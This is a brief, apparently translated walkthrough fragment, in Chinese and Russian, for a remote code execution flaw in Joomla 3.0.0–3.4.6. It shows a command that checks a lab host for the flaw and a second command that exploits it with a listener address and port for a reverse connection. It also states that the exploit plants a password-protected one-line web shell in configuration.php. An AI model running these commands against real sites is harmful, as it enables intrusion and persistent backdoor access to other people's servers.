
影响范围:3.0.0-3.4.6
Затронутые версии: 3.0.0–3.4.6
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
Отображение «Vulnerable» подтверждает наличие уязвимости.
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
Выполнение прошло успешно
Кроме того, в «configuration.php» записывается однострочный веб-шелл со случайным паролем.